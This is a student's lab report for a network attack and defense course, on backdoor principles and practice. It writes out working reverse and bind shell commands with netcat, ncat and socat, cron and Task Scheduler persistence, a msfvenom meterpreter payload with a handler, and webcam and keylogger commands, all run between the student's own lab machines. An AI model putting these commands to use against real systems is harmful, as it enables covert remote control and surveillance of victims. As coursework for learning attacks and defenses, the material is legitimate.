2018-2019-2 20165209 《网络对抗技术》Exp2:后门原理与实践

2018-2019-2 20165209 《网络对抗技术》Exp2:后门原理与实践

1 后门原理与实验内容

1.1 后门原理

-后门就是不经过正常认证流程而访问系统的通道。

  • 哪里有后门呢?
    • 编译器留后门
    • 操作系统留后门
    • 最常见的当然还是应用程序中留后门
    • 还有就是潜伏于操作系统中或伪装为特定应用的专用后门程序。

1.2 实验内容

任务一:使用netcat获取主机操作Shell,cron启动 (0.5分)

任务二:使用socat获取主机操作Shell, 任务计划启动 (0.5分)

任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)

任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)

2 基础问题回答

  • 问:例举你能想到的一个后门进入到你系统中的可能方式?

问:例举你知道的后门如何启动起来(win及linux)的方式?
win:修改注册表、设置为开机自启动、诱导用户点击从而执行等等。
Linux:可以通过crontab功能将木马设为定时启动,也可以通过对正常软件的绑定注入shellcode达到开启后门的目的。
问:Meterpreter有哪些给你映像深刻的功能?
这次试验给我留下深刻印象的主要有获取目标主机音频、摄像头、击键记录等内容。除此之外还有植入后门实施远程控制、metsvc后渗透攻击模块等等。
问:如何发现自己有系统有没有被安装后门?
可以检测网络连接,查看是否有IP与本机建立连接;安装专门的杀毒软件,实时防护,并定期检测电脑安全情况;查看任务计划程序、开机自启动项中是否有可疑程序,等等。

(1) 例举你能想到的一个后门进入到你系统中的可能方式?

  • 在访问某些网站的时候,点开图片可能就会内置后门,在用户不易察觉的情况下,下载木马病毒安装在电脑中,威胁我们的主机的安全。

(2) 例举你知道的后门如何启动起来(win及linux)的方式?

  • win中可以修改系统注册表,或者隐藏后缀名诱使用户点开。
  • linux中可以通过crontab功能将木马设为定时启动。

(3) Meterpreter有哪些给你映像深刻的功能?

(4)如何发现自己有系统有没有被安装后门?

3 实验步骤

3.1 Windows获得Linux Shell

  • win10中输入ipconfig查看IP为 172.30.5.45。

2018-2019-2 20165209 《网络对抗技术》Exp2:后门原理与实践

  • 在win10中输入ncat.exe -l -p 5209监听win10的5209端口。
  • 在kali中输入nc 172.30.5.45 5209 -e /bin/sh反弹连接win10的5209端口。
  • 在win10中成功获得kali的shell。

2018-2019-2 20165209 《网络对抗技术》Exp2:后门原理与实践

2018-2019-2 20165209 《网络对抗技术》Exp2:后门原理与实践

3.2 Linux获得Windows Shell

  • kali中输入ifconfig查看IP为 192.168.25.132.

2018-2019-2 20165209 《网络对抗技术》Exp2:后门原理与实践

  • 在kali中输入nc -l -p 5209监听kali的5209端口。
  • 在win10中输入ncat.exe -e cmd.exe 192.168.25.132 5209反弹连接kali的5209端口。
  • 在kali中成功获得win10的shell。

2018-2019-2 20165209 《网络对抗技术》Exp2:后门原理与实践

2018-2019-2 20165209 《网络对抗技术》Exp2:后门原理与实践

3.3 使用netcat获取主机操作Shell,cron启动

  • 在win10中输入ncat.exe -l -p 5209监听win10的5209端口。
  • 在kali中输入crontab -e编辑一条定时任务。
  • 我当时的时间是11:35为了尽快看到效果,我编辑的指令是37 * * * * /bin/netcat 172.30.5.45 5209 -e /bin/sh表示每个小时的第37分钟反弹连接Win10的5209端口。
  • 当时间到了11点37时,成功获得Kali的shell,可以输入指令。

2018-2019-2 20165209 《网络对抗技术》Exp2:后门原理与实践

2018-2019-2 20165209 《网络对抗技术》Exp2:后门原理与实践

3.4 使用socat获取主机操作Shell

  • win10中右击windows图标,选择“计算机管理”。
  • 在“任务计划程序”创建任务,填写任务名称,并新建一个触发器。

2018-2019-2 20165209 《网络对抗技术》Exp2:后门原理与实践

2018-2019-2 20165209 《网络对抗技术》Exp2:后门原理与实践

  • 在操作->程序或脚本中选择socat.exe文件的路径,在添加参数一栏填写tcp-listen:5209 exec:cmd.exe,pty,stderr,作用是把cmd.exe绑定到端口5209,同时把cmd.exe的stderr重定向到stdout上。

2018-2019-2 20165209 《网络对抗技术》Exp2:后门原理与实践

  • 创建完成之后,按Windows+L快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行。

2018-2019-2 20165209 《网络对抗技术》Exp2:后门原理与实践

  • 同时在Kali中输入指令socat - tcp:172.30.5.45:5209成功获得了一个cmd shell

2018-2019-2 20165209 《网络对抗技术》Exp2:后门原理与实践

3.5 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  • 在kali输入指令
    msfvenom -p windows/meterpreter/reverse_tcp LHOST= 192.168.25.132 LPORT=5209 -f exe > 20165209_backdoor.exe生成后门程序
  • 在Win10中输入ncat.exe -lv 5209 > 20165209_backdoor.exe进入接收文件模式
  • 在kali中输入nc 172.30.5.45 5209 < 20165209_backdoor.exeIP为win10的IP

  • 在Kali中打开一个终端,输入msfconsole进入msf控制台
  • 输入use exploit/multi/handler使用监听模块,设置payload
  • 输入set payload windows/meterpreter/reverse_tcp使用和生成后门程序时相同的payload
  • 输入set LHOST 192.168.25.132
  • 输入set LPORT 5215
  • 输入show options进行查看,显示设置的ip地址和端口号

  • 输入exploit开始监听
  • win10中运行后门程序20165209_backdoor.exe
  • 此时kali获得win10的连接,并且得到了远程控制的shell

2018-2019-2 20165209 《网络对抗技术》Exp2:后门原理与实践

2018-2019-2 20165209 《网络对抗技术》Exp2:后门原理与实践

2018-2019-2 20165209 《网络对抗技术》Exp2:后门原理与实践

3.6 使用MSF meterpreter生成获取目标主机摄像头、击键记录等内容

  • 重复3.5的操作直至exploit
  • 输入webcam_snap使用摄像头进行拍照

2018-2019-2 20165209 《网络对抗技术》Exp2:后门原理与实践

2018-2019-2 20165209 《网络对抗技术》Exp2:后门原理与实践

  • 输入keyscan_start开始记录击键的过程,输入keyscan_dump读取击键的记录

2018-2019-2 20165209 《网络对抗技术》Exp2:后门原理与实践

实验总结与体会

实验做了很长时间,真的很考验心态,但是实验还是很有意思的,发现原来获取一台电脑的shell其实并没有想象那么难,但同时也让我对网络有点害怕,还是要把摄像头关好的,定期杀毒,补漏洞很有必要。

上一篇:rar安装和使用


下一篇:浅谈用java解析xml文档(三)